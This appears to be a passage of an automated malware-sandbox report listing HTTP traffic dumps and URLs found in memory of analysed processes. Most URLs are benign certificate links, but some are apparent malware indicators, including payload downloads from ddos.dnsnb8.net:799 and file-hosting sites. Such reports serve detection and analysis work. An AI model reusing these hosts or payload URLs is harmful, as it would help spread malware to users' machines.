Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:57:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: IXDaI.exe, 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmp, IXDaI.exe, 00000005.00000003.1268611401.0000000001120000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000003.1624080996.0000000001290000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
                  Source: B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.drString found in binary or memory: http://.css
                  Source: B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.drString found in binary or memory: http://.jpg
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: 753F.exe.14.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                  Source: 753F.exe.14.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: explorer.exe, 0000000E.00000000.1447298084.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: 753F.exe.14.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                  Source: 753F.exe.14.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                  Source: 753F.exe.14.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                  Source: 753F.exe.14.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: vm.exe, 00000025.00000002.3739679273.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: vm.exe, 00000025.00000002.3755459555.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: vm.exe, 00000025.00000003.3158868527.00000000055EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?987c63ebbb8ce
                  Source: IXDaI.exe, 00000005.00000003.1330174994.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1337998846.000000000118B000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000002.1466246003.0000000001168000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
                  Source: IXDaI.exe, 00000005.00000003.1330174994.00000000011C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarP
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarY
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar6
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarB
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar#
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarO
                  Source: IXDaI.exe, 00000011.00000002.1680424006.000000000137E000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar5
                  Source: IXDaI.exe, 00000011.00000002.1680424006.000000000137E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
                  Source: B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.drString found in binary or memory: http://html4/loose.dtd
                  Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 0000000E.00000000.1444506660.000000000305D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: 753F.exe.14.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: 753F.exe.14.drString found in binary or memory: http://ocsps.ssl.com0?
                  Source: 753F.exe.14.drString found in binary or memory: http://ocsps.ssl.com0_
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: 753F.exe, 0000001C.00000002.2708165528.000001C080410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.co
                  Source: explorer.exe, 0000000E.00000000.1444301138.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1446452497.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1446467091.0000000007B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: 753F.exe, 0000001C.00000002.2708165528.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A67961000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A690FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store4.gofile.io
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.activestate.com
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.activestate.comHolger
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.baanboard.com
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.baanboard.comBrendon
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.develop.com
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.develop.comDeepak
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.lua.org
                  Source: F6D9.exeString found in binary or memory: http://www.oberhumer.com
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.rftp.com
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.rftp.comJosiah
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.scintilla.org
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.scintilla.org/scite.rng
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.spaceblue.com
                  Source: SciTE.exe.5.drString found in binary or memory: http://www.spaceblue.comMathias
                  Source: 753F.exe.14.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                  Source: 753F.exe.14.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A68B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A68DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/$
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X
                  Source: explorer.exe, 0000000E.00000000.1443804807.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
